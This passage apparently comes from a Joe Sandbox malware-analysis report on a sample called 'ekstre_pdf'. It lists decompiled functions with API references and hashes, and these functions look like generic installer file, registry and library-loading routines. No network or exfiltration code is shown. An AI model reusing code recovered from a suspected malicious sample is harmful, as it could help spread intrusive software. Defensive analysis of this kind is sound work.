0x00402c2d
0x00402c39

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,00001FFF), ref: 004025D1
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslB24E.tmp,00000000,00000011,00000002), ref: 004025FD

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 78989c6c964c72a847ff967a81544cccf54f5b06ca33b92494bd859500bcd016
Instruction ID: 6dc8e3a8e0bf2fdbcde8a6f6d489c1499877267d158d0f0a00c96622d4383642
Opcode Fuzzy Hash: 78989c6c964c72a847ff967a81544cccf54f5b06ca33b92494bd859500bcd016
Instruction Fuzzy Hash: 9D018FB1A04105BBEB159F94DE58AAEB67CFF40348F10403EF501B61C0EBB84E45976D

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x47af30;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x472eec =  *0x472eec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x472eec, 0x7530,  *0x472ed4), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 9f3865627a838fcb71a96ad02477dd920341a60cd0e2aa231d5f85c1e183bc70
Instruction ID: 90e956dbb2fd0a83091e614c3525eff2e6ea2469311de72eaa3366dc7eb1536f
Opcode Fuzzy Hash: 9f3865627a838fcb71a96ad02477dd920341a60cd0e2aa231d5f85c1e183bc70
Instruction Fuzzy Hash: A7012831A20220DBE7094B389E05B2A369CE710318F10823FF855F75F1E6B8CC829B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040690A Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040690A(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, "true", 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,004E8000,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x0040600d
0x00406013
0x00406018
0x00406021
0x00406021
0x0040602a

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,004E0000,004E0000,004E0000,004E0000,004E0000,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 6ED62D14 Relevance: 1.6, APIs: 1, Instructions: 143
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E6ED62D14(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x6ed65024 != 0 && E6ED61BC1(_a4) == 0) {
					 *0x6ed65030 = _t86;
					if( *0x6ed65034 != 0) {
						_t86 =  *0x6ed65034;
					} else {
						E6ED63250(E6ED61C43());
						 *0x6ed65034 = _t86;
					}
				}
				_t28 = E6ED61C49(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E6ED61BBB();
					_t67 = _a4;
					_t74 =  *0x6ed65028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x6ed65028 = _t67;
					E6ED61C5A();
					_t33 = ReadFile(??, ??, ??, ??, ??); // executed
					 *0x6ed65000 = _t33;
					 *0x6ed65004 = _t74;
					if( *0x6ed65024 != 0 && E6ED61BC1( *0x6ed65028) == 0) {
						 *0x6ed65034 = _t87;
						_t87 =  *0x6ed65030;
					}
					_t75 =  *0x6ed65028;
					_a4 = _t75;
					 *0x6ed65028 =  *((intOrPtr*)(E6ED61BBB() + _t75));
					_t37 = E6ED61BAD(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E6ED61C49(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E6ED61C54() + _a4 + _v8);
							_push(E6ED61C64());
							if( *0x6ed65024 <= 0 || E6ED61BC1(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x6ed65034;
								_t76 = _t64 + _t78 * 4;
								 *0x6ed65034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x6ed65028 == 0) {
						 *0x6ed65034 = 0;
					}
					_push( *0x6ed65004);
					E6ED62CBF(_t37, _t64, _t76, _a4,  *0x6ed65000);
					return _a4;
				}
				_push(E6ED61C54() + _a4);
				_t53 = E6ED61C60();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E6ED61CC3();
				_t80 = E6ED61CBF();
				_t83 = E6ED61C64();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x6ed62d24
0x6ed62d35
0x6ed62d42
0x6ed62d56
0x6ed62d44
0x6ed62d49
0x6ed62d4e
0x6ed62d4e
0x6ed62d42
0x6ed62d5f
0x6ed62d64
0x6ed62d6a
0x6ed62dae
0x6ed62dae
0x6ed62db3
0x6ed62db8
0x6ed62dbe
0x6ed62dc0
0x6ed62dc6
0x6ed62dd3
0x6ed62dd5
0x6ed62dda
0x6ed62de7
0x6ed62dfa
0x6ed62e00
0x6ed62e06
0x6ed62e07
0x6ed62e0d
0x6ed62e19
0x6ed62e1f
0x6ed62e27
0x6ed62e28
0x6ed62e2b
0x6ed62e36
0x6ed62e38
0x6ed62e44
0x6ed62e4a
0x6ed62e52
0x6ed62e7e
0x6ed62e7f
0x6ed62e85
0x6ed62e85
0x6ed62e88
0x6ed62e89
0x6ed62e8c
0x6ed62e62
0x6ed62e62
0x6ed62e63
0x6ed62e65
0x6ed62e68
0x6ed62e6e
0x6ed62e71
0x6ed62e77
0x6ed62e7a
0x6ed62e7a
0x6ed62e52
0x6ed62e36
0x6ed62e95
0x6ed62e97
0x6ed62e97
0x6ed62ea1
0x6ed62eb0
0x6ed62ebe
0x6ed62ebe
0x6ed62d75
0x6ed62d76
0x6ed62d7b
0x6ed62d7f
0x6ed62d84
0x6ed62d98
0x6ed62d99
0x6ed62d9a
0x6ed62d9c
0x6ed62da1
0x6ed62da3
0x6ed62da3
0x6ed62da6
0x6ed62dac
0x00000000

APIs

ReadFile.KERNEL32(?), ref: 6ED62DD3

Memory Dump Source

Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 77a8d934acd9e34f75c6fe0a8f17b685f29bf18f4e49d3cc402739bd24120abd
Instruction ID: e46001e2f9580c44ef479cd3bbeb5cd169c918408ff050d1da51a84778364eff
Opcode Fuzzy Hash: 77a8d934acd9e34f75c6fe0a8f17b685f29bf18f4e49d3cc402739bd24120abd
Instruction Fuzzy Hash: D041BD71904605EFEF50DFE4DA80BAD77B8EB0631CF204C2AE5089B212D735D496CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 767d5541a4ec51a0e617c90de0697c9fdfeb51e02ed47aac05e07363b3aedab5
Instruction ID: 56736f3d663be00ed370b3cc3cf4ae36fbc520ed088adf857d230e96c051e1fc
Opcode Fuzzy Hash: 767d5541a4ec51a0e617c90de0697c9fdfeb51e02ed47aac05e07363b3aedab5
Instruction Fuzzy Hash: 86E09271A04105BFDB01EFA5AE499AEB3B8EF44309B10483BF106F00C1DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004023b2
0x004023b2
0x004023b4
0x004023b8
0x004023bb
0x004023c0
0x004023c5
0x004023ce
0x004023ce
0x004023d3
0x004023dc
0x004023dc
0x004023e9
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

